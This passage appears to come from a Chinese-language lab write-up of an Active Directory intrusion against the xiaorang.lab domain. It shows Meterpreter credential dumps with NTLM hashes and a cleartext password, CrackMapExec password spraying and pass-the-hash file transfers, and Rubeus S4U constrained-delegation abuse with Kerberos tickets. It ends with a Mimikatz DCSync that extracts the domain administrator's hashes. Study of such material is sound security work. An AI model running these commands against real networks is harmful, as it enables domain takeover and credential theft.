MSSQLSERVER20:1023:aad3b435b51404eeaad3b435b51404ee:f5c512b9cb3052c5ad35e526d44ba85a:::
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1 DPAPI
-------- ------ ---- ---- -----
MSSQLSERVER$ XIAORANG 7e0afdd74f437da621b7b205a61781e1 ee10ad3bcc7deb1eeeca840d879218bcccf292fc
MSSQLSERVER$ XIAORANG cea3e66a2715c71423e7d3f0ff6cd352 6de4e8f192569bbc44ae94f273870635ae878094
MSSQLSERVER01 MSSQLSERVER ded5ad90b3d8560838a777039641c673 a2cd9d2963f29b162847e8a1a2c19d5e0641a162
MSSQLSERVER02 MSSQLSERVER 3aa518732551a136003ea41f9599a1ec 6f1ed1f677201d998667bd8e3b81cfb52b9a138a
MSSQLSERVER03 MSSQLSERVER 2f7c88f56a7236f476d18ea6b5a2d33a 5bc2d09b8b0f7c11a1fc3fb2f97b713ac116b6eb
MSSQLSERVER04 MSSQLSERVER 36bd3cceea3d413e8111b0bef32da84d 414d2c783a3fb2ba855e41c243c583bb0604fe02
MSSQLSERVER05 MSSQLSERVER b552da4a7f732c40ca73c01dfaea7ebc 7f041a31e763eed45fb881c7f77831b888c3051d
MSSQLSERVER06 MSSQLSERVER aa206c617e2194dd76b766b7e3c92bc6 62dd8046a71c17fe7263bab86b1ca4506f8c373c
MSSQLSERVER07 MSSQLSERVER f9f990df1bc869cc205d2513b788a5b8 79746cfe5a2f1eec4350a6b64d87b01455ef9030
MSSQLSERVER08 MSSQLSERVER 465034ebde60dfae889c3e493e1816bf c96428917f7c8a15ea0370716dee153842afaf02
MSSQLSERVER09 MSSQLSERVER 2dd7fe93426175a9ff3fa928bcf0eb77 a34c0482568fc9329f33ccdc1852fab9ef65bcd1
MSSQLSERVER10 MSSQLSERVER c3e7aa593081ae1b210547da7d46819b 3bf20cfece021438cf86617f5cabc5e7a69038f7
MSSQLSERVER11 MSSQLSERVER cee10216b2126aa1a3f239b8201120ef 4867093fc519f7d1e91d80e3790ef8a17a7fdd18
MSSQLSERVER12 MSSQLSERVER 672702a4bd7524269b77dbb6b2e75911 c7a828609e4912ab752b43deda8351dc1a8ea240
MSSQLSERVER13 MSSQLSERVER b808e9a53247721e84cc314c870080c5 47a42f4a6eed2b2d90f342416f42e2696052f546
MSSQLSERVER14 MSSQLSERVER 7c8553b614055d945f8b8c3cf8eae789 1efdc2efed20ca503bdefea5aef8aa0ea04c257b
MSSQLSERVER15 MSSQLSERVER 6eeb34930fa71d82a464ce235261effd 1dfc6d66d9cfdbaa5fc091fedde9a3387771d09b
MSSQLSERVER16 MSSQLSERVER 42c0eed1872923f6b60118d9711282a6 dcf14b63c01e9d5a9d4d9c25d1b2eb6c65c2e3a6
MSSQLSERVER17 MSSQLSERVER 82fe575c8bb18d01df45eb54d0ebc3b4 13b87dcba388982dcc44feeba232bb50aa29c7e9
MSSQLSERVER18 MSSQLSERVER 31de1b5e8995c7f91070f4a409599c50 070c0d12760e50812236b5717c75222a206aace8
MSSQLSERVER19 MSSQLSERVER 9ce3bb5769303e1258f792792310e33b 1a2452c461d89c45f199454f59771f17423e72f9
MSSQLSERVER20 MSSQLSERVER f5c512b9cb3052c5ad35e526d44ba85a b09c8d9463c494d36e1a4656c15af8e1a7e4568f
William XIAORANG 0039d58e50eed2a9a9531e8073905fc5 3bbfd4bb16c0d90a78ab2fa44f9e936f3f797252 d585a2ea2499a34b6a463ae99990454a
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
MSSQLSERVER$ XIAORANG (null)
MSSQLSERVER01 MSSQLSERVER (null)
MSSQLSERVER02 MSSQLSERVER (null)
MSSQLSERVER03 MSSQLSERVER (null)
MSSQLSERVER04 MSSQLSERVER (null)
MSSQLSERVER05 MSSQLSERVER (null)
MSSQLSERVER06 MSSQLSERVER (null)
MSSQLSERVER07 MSSQLSERVER (null)
MSSQLSERVER08 MSSQLSERVER (null)
MSSQLSERVER09 MSSQLSERVER (null)
MSSQLSERVER10 MSSQLSERVER (null)
MSSQLSERVER11 MSSQLSERVER (null)
MSSQLSERVER12 MSSQLSERVER (null)
MSSQLSERVER13 MSSQLSERVER (null)
MSSQLSERVER14 MSSQLSERVER (null)
MSSQLSERVER15 MSSQLSERVER (null)
MSSQLSERVER16 MSSQLSERVER (null)
MSSQLSERVER17 MSSQLSERVER (null)
MSSQLSERVER18 MSSQLSERVER (null)
MSSQLSERVER19 MSSQLSERVER (null)
MSSQLSERVER20 MSSQLSERVER (null)
William XIAORANG (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator XIAORANG.LAB (null)
MSSQLSERVER$ xiaorang.lab 74 c0 59 17 5b f3 c2 9b 8b c9 43 f4 35 0e 72 19 29 e0 f1 0a 1f f5 b1 ea 82 d3 50 50 13 40 65 58 c2 e7 5d ce 96 df 96 54 3b 46 69 23 2b 52 a6 d1 9d cb b5 b6 c9 ec 41 0d ae
1b ec 43 d1 f6 3f a1 28 74 b2 7c 70 30 a2 d6 8e ed f6 c6 3e b3 d2 dd e4 ff 5b 83 53 45 76 a3 ed 86 b5 ad 02 cd 40 aa 71 87 fc fe 1b f0 d2 7f 9a 2c 00 c2 41 21 8a 05 8e d1
65 1b ab c3 af 02 36 98 10 7a 64 62 79 c1 44 af 89 5a 7d e5 9a e3 89 ee fc 46 ee 31 aa fe a8 af 9b 04 fa 56 55 c2 23 f7 07 86 38 41 c6 de c9 72 59 0e bd 39 5b 0a b6 48 59
7f 5c ef ed 4e 95 e4 7e b5 84 10 76 9d 9a 22 08 50 ab 41 e1 d6 dc 3e 48 59 98 24 fc ce 69 01 5f 0c 68 7f ab 6b fe 0f 7b 1c d0 bb f3 d2 71 0e a3 c1 5b d0 d4 4d f0 0c 5b e3
6e e9 66 a5 2b 60 e3 b6 eb 9d f0 d6
MSSQLSERVER$ XIAORANG.LAB (null)
MSSQLSERVER$ xiaorang.lab (p4Spnv`&9xTZ=D'D/lz[a:94O:$E!7&zfcMza9k;Se"&>cBCBU0bxw.xL"B>\GmtUT,<:q3Yxfq#`O3sLI;OK" (_T_T5- $zV]-i;)c$qIj&$RgttdZI"m
MSSQLSERVER01 MSSQLSERVER (null)
MSSQLSERVER02 MSSQLSERVER (null)
MSSQLSERVER03 MSSQLSERVER (null)
MSSQLSERVER04 MSSQLSERVER (null)
MSSQLSERVER05 MSSQLSERVER (null)
MSSQLSERVER06 MSSQLSERVER (null)
MSSQLSERVER07 MSSQLSERVER (null)
MSSQLSERVER08 MSSQLSERVER (null)
MSSQLSERVER09 MSSQLSERVER (null)
MSSQLSERVER10 MSSQLSERVER (null)
MSSQLSERVER11 MSSQLSERVER (null)
MSSQLSERVER12 MSSQLSERVER (null)
MSSQLSERVER13 MSSQLSERVER (null)
MSSQLSERVER14 MSSQLSERVER (null)
MSSQLSERVER15 MSSQLSERVER (null)
MSSQLSERVER16 MSSQLSERVER (null)
MSSQLSERVER17 MSSQLSERVER (null)
MSSQLSERVER18 MSSQLSERVER (null)
MSSQLSERVER19 MSSQLSERVER (null)
MSSQLSERVER20 MSSQLSERVER (null)
William XIAORANG.LAB Willg1UoO6Jt
mssqlserver$ XIAORANG.LAB 74 c0 59 17 5b f3 c2 9b 8b c9 43 f4 35 0e 72 19 29 e0 f1 0a 1f f5 b1 ea 82 d3 50 50 13 40 65 58 c2 e7 5d ce 96 df 96 54 3b 46 69 23 2b 52 a6 d1 9d cb b5 b6 c9 ec 41 0d ae
1b ec 43 d1 f6 3f a1 28 74 b2 7c 70 30 a2 d6 8e ed f6 c6 3e b3 d2 dd e4 ff 5b 83 53 45 76 a3 ed 86 b5 ad 02 cd 40 aa 71 87 fc fe 1b f0 d2 7f 9a 2c 00 c2 41 21 8a 05 8e d1
65 1b ab c3 af 02 36 98 10 7a 64 62 79 c1 44 af 89 5a 7d e5 9a e3 89 ee fc 46 ee 31 aa fe a8 af 9b 04 fa 56 55 c2 23 f7 07 86 38 41 c6 de c9 72 59 0e bd 39 5b 0a b6 48 59
7f 5c ef ed 4e 95 e4 7e b5 84 10 76 9d 9a 22 08 50 ab 41 e1 d6 dc 3e 48 59 98 24 fc ce 69 01 5f 0c 68 7f ab 6b fe 0f 7b 1c d0 bb f3 d2 71 0e a3 c1 5b d0 d4 4d f0 0c 5b e3
6e e9 66 a5 2b 60 e3 b6 eb 9d f0 d6
meterpreter >
获取到的域用户凭据,但密码过期了:
1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~]
└─# proxychains4 -q cme smb 172.22.2.3/24 -u William -p Willg1UoO6Jt
SMB 172.22.2.16 445 MSSQLSERVER [*] Windows Server 2016 Datacenter 14393 x64 (name:MSSQLSERVER) (domain:xiaorang.lab) (signing:False) (SMBv1:True)
SMB 172.22.2.3 445 DC [*] Windows Server 2016 Datacenter 14393 x64 (name:DC) (domain:xiaorang.lab) (signing:True) (SMBv1:True)
SMB 172.22.2.18 445 UBUNTU-WEB02 [*] Windows 6.1 Build 0 (name:UBUNTU-WEB02) (domain:) (signing:False) (SMBv1:False)
SMB 172.22.2.34 445 CLIENT01 [*] Windows 10.0 Build 18362 x64 (name:CLIENT01) (domain:xiaorang.lab) (signing:False) (SMBv1:False)
SMB 172.22.2.16 445 MSSQLSERVER [-] xiaorang.lab\William:Willg1UoO6Jt STATUS_PASSWORD_EXPIRED
SMB 172.22.2.3 445 DC [-] xiaorang.lab\William:Willg1UoO6Jt STATUS_PASSWORD_EXPIRED
SMB 172.22.2.18 445 UBUNTU-WEB02 [+] \William:Willg1UoO6Jt
SMB 172.22.2.34 445 CLIENT01 [-] xiaorang.lab\William:Willg1UoO6Jt STATUS_PASSWORD_EXPIRED
RDP 登录 172.22.2.34 主机修改密码:
1
2
3
4
5
6
7
┌──(root㉿kali)-[~]
└─# proxychains4 -q rdesktop 172.22.2.34 -d xiaorang.lab -u William -p Willg1UoO6Jt -z
Autoselecting keyboard map 'en-us' from locale
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.
可以使用修改后的密码进行登录:
1
2
3
4
5
6
7
┌──(root㉿kali)-[~]
└─# proxychains4 -q cme rdp 172.22.2.34/24 -u William -p newWillg1UoO6Jt
RDP 172.22.2.3 3389 DC [*] Windows 10 or Windows Server 2016 Build 14393 (name:DC) (domain:xiaorang.lab) (nla:True)
RDP 172.22.2.16 3389 MSSQLSERVER [*] Windows 10 or Windows Server 2016 Build 14393 (name:MSSQLSERVER) (domain:xiaorang.lab) (nla:True)
RDP 172.22.2.3 3389 DC [+] xiaorang.lab\William:newWillg1UoO6Jt
RDP 172.22.2.16 3389 MSSQLSERVER [+] xiaorang.lab\William:newWillg1UoO6Jt (Pwn3d!)
RDP 172.22.2.34 3389 CLIENT01 [*] Windows 10 or Windows Server 2016 Build 18362 (name:CLIENT01) (domain:xiaorang.lab) (nla:True)
Kerberos Constrained Delegation
上传 SharpHound.exe 进行域环境分析:
1
2
3
4
5
6
┌──(root㉿kali)-[~]
└─# proxychains4 -q cme smb 172.22.2.16 -u Administrator -H dfa8555b0bf46e5dac5aafe86bb2891e --local-auth --put-file ./SharpHound.exe "Users\\Public\\SharpHound.exe"
SMB 172.22.2.16 445 MSSQLSERVER [*] Windows Server 2016 Datacenter 14393 x64 (name:MSSQLSERVER) (domain:MSSQLSERVER) (signing:False) (SMBv1:True)
SMB 172.22.2.16 445 MSSQLSERVER [+] MSSQLSERVER\Administrator:dfa8555b0bf46e5dac5aafe86bb2891e (Pwn3d!)
SMB 172.22.2.16 445 MSSQLSERVER [*] Copy SharpHound.exe to Users\Public\SharpHound.exe
SMB 172.22.2.16 445 MSSQLSERVER [+] Created file SharpHound.exe on \\C$\Users\Public\SharpHound.exe
下载文件:
1
2
3
4
5
6
┌──(root㉿kali)-[~]
└─# proxychains4 -q cme smb 172.22.2.16 -u Administrator -H dfa8555b0bf46e5dac5aafe86bb2891e --local-auth --get-file "\\Users\\Public\\20230721003527_BloodHound.zip" /home/kali/20230721003527_BloodHound.zip --code GBK
SMB 172.22.2.16 445 MSSQLSERVER [*] Windows Server 2016 Datacenter 14393 x64 (name:MSSQLSERVER) (domain:MSSQLSERVER) (signing:False) (SMBv1:True)
SMB 172.22.2.16 445 MSSQLSERVER [+] MSSQLSERVER\Administrator:dfa8555b0bf46e5dac5aafe86bb2891e (Pwn3d!)
SMB 172.22.2.16 445 MSSQLSERVER [*] Copying \Users\Public\20230721003527_BloodHound.zip to /home/kali/20230721003527_BloodHound.zip
SMB 172.22.2.16 445 MSSQLSERVER [+] File \Users\Public\20230721003527_BloodHound.zip was transferred to /home/kali/20230721003527_BloodHound.zip
计算机 MSSQLSERVER.XIAORANG.LAB 具有对计算机 DC.XIAORANG.LAB 的约束委派权限:
使用 PowerView 查找配置了约束委派的机器:
1
2
3
4
5
6
7
8
9
10
11
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_import /PowerView.ps1
[+] File successfully imported. No result was returned.
meterpreter > powershell_execute "Get-DomainComputer -TrustedToAuth -Properties samaccountname,msds-allowedtodelegateto"
[+] Command execution completed:
samaccountname msds-allowedtodelegateto
-------------- ------------------------
MSSQLSERVER$ {ldap/DC.xiaorang.lab/xiaorang.lab, ldap/DC.xiaorang.lab, ldap/DC, ldap/DC.xiaorang.lab/XIAORANG...}
meterpreter >
- 使用 Rubeus 以拥有约束性委派权限的 MSSQLSERVER$ 账户凭据向 KDC 请求一个可转发的 TGT;
- 再使用 S4U2self 协议以域管理员身份去请求 MSSQLSERVER$ 自身可转发的服务票据 ST1;
- 最后使用 ST1 通过 S4U2proxy 协议去冒充域管理员身份请求到
ldap/DC.xiaorang.lab的服务票据。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
PS C:\Users\William\Desktop> .\Rubeus.exe s4u /user:MSSQLSERVER$ /rc4:7e0afdd74f437da621b7b205a61781e1 /impersonateuser:Administrator /msdsspn:ldap/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.3
[*] Action: S4U
[*] Using rc4_hmac hash: 7e0afdd74f437da621b7b205a61781e1
[*] Building AS-REQ (w/ preauth) for: 'xiaorang.lab\MSSQLSERVER$'
[*] Using domain controller: 172.22.2.3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3lkC6JQjHfRCcji5EMsY39Dv/i2//jnIfAkQSjQ1OHlel3r4Wh+lg/u7jAgirmDe18ZnnkVv0it5WM8dNAN6rTYBXP/AxGVuWQWU63EDmtmlXsDmSrSqILnJ+2MZUl2pwX69KQDRJOB5ewy7AW3sPI0JmmJjkVrD98D+UgEqw1XX2xzBiylC2PNPGnqkSm6FA+Itgj2s6KsGITu5uYP9E6dT0Tnv3MzeQMq19/0WoHmy7sNQxgTDLr3hM5za/hE2VxZfijuIA4mZYV+2Uk998xNPgDstAqA22dB5aEnvOYQyIL1cRGE9vJtlc9R0o97tedCTQlu+PyGwsoQsNVx+rbJrSL+CXA9SDPjaULYlJtTZn8PfWUUpWfyU/MjIPQb+l75+lnZmh0rxDRVmQjYJKTVARTmMz+YZ4rV9P+RUNTYBGvZkg65kCT7m4/EGKtNW9zTLAKF3rRX1lgqB9NlVhPCp4gBZxTvzxY+3li6g62NNmwduFFvSpcH4pN+Ra4dIUXF26VlBsxPFU9j0UIOl4UwojwEWQ9IP1gCzH0Xv8MwMsLjeSZhAYoMVObFisd7JSiG31jA4v90BD5JCcYq58xHcUSCf6/k/dvYV6wVMTUSfjrzeQ8Cb1vlxoORgaRNrKT8Jrv8AilqBLwJ/VMMrI5CI9gf4wbfHMObuVe0ekw6Ep2Ef/uBSlpN9kq9UEHNGitAsQzyeIIjxNX5bF+uFRV3j9zawgcEDSA62B+YiCDhe2Kh3cZgM7oDXoy9CPUuW1J2tSv6v6I6j/LMStZtXqnem8aLlSEHUL1p3NWP5CTtJTHlICfxihKcQQbJHtjMePimaSyWUq/gsleaDfty6s+Cv87Gg2ycaZEkep5tbzxz/BLMRzvq4weZdm4Iqee9kWt0uPhBPjDTw2qHLqdxOEhbSKS+wD6JNvN+xJJEe/g7cJL9ndstjKDxD6K6IvW1UMwsdGgn2Zx62Q2yvUG1M/cXpMkAYAVaAjNSkdO8lfgMKrOTU+bz6AM9u5GupaUrzII0tcOlN8gcYv7Pcwsw7F+4GWokEJ/NW5Y0jmcsn+Azi5w3V+VgPBw5FtHCEfoaU+EupxVUnqJSJbq3VrZK/NbV4AZXSY3gYwpqMc4cew5jYI1G1iL8aHiNxcVtdCwQ5wAQoDwJBkr/czCt3PVQaR6V1rSx9ds4hUG1FZHVBy8JVv0oFQQxsx22NB2Tb6aeaSsRQmHMSO94BAl5ChO492PwCQnR7vTzUcjI55zXcnmzEdKgN0I4HsjeTVq7gD4iELF2wJLABQSGJl+MyBms0yyyBXsVr6I6Ex06BUqADgCEX8JskIdlxyJuegtv2JT3gb98cZ0dut9e+ym5Y4w/CslV59lmrq/mX3I7Ki+uKbu1qcK94fSAnRjlLRUjranhKAheVGDVW2AjHbmvW8oN8rEPri3lJ4UGHtJH2WfuHnjcliz2773vyYFwbNhGtqjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBA8maMBmJBiqwedjqcg2RbdoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIzMDcyNDA5NDEwN1qmERgPMjAyMzA3MjQxOTQxMDdapxEYDzIwMjMwNzMxMDk0MTA3WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==
[*] Action: S4U
[*] Building S4U2self request for: 'MSSQLSERVER$@XIAORANG.LAB'
[*] Using domain controller: DC.xiaorang.lab (172.22.2.3)
[*] Sending S4U2self request to 172.22.2.3:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'MSSQLSERVER$@XIAORANG.LAB'
[*] base64(ticket.kirbi):
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
[*] Impersonating user 'Administrator' to target SPN 'ldap/DC.xiaorang.lab'
[*] Building S4U2proxy request for service: 'ldap/DC.xiaorang.lab'
[*] Using domain controller: DC.xiaorang.lab (172.22.2.3)
[*] Sending S4U2proxy request to domain controller 172.22.2.3:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'ldap/DC.xiaorang.lab':
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
[+] Ticket successfully imported!
Rubeus 会将票据导入至内存中,此时就可以向域控发起 DCSync 请求,导出凭据:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
PS C:\Users\William\Desktop> .\mimikatz "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /user:Administrator
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC.xiaorang.lab' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration : 1601/1/1 8:00:00
Password last change : 2023/7/24 13:34:24
Object Security ID : S-1-5-21-2704639352-1689326099-2164665914-500
Object Relative ID : 500
Credentials:
Hash NTLM: 1a19251fbd935969832616366ae3fe62
ntlm- 0: 1a19251fbd935969832616366ae3fe62
ntlm- 1: 1a19251fbd935969832616366ae3fe62
lm - 0: 61f05bd7901ea8e17ebd4a413b2b9360
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : c8ce3d33443000a1da54c7ea60807cfe
* Primary:Kerberos-Newer-Keys *
Default Salt : XIAORANG.LABAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 3f91ec8a41fe7f074cd9dde729759b53f8b02a2804f3317400efca39ad9d71b4
aes128_hmac (4096) : 4f61f64c4df0a8b43c55a82a03f53283
des_cbc_md5 (4096) : e302404989526829
* Primary:Kerberos *
Default Salt : XIAORANG.LABAdministrator
Credentials
des_cbc_md5 : e302404989526829
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 f49b5f58ea17c16d84b6caed3329e3eb
02 2981a4cb7b89f9bdbe88b7e0a4be4bcd
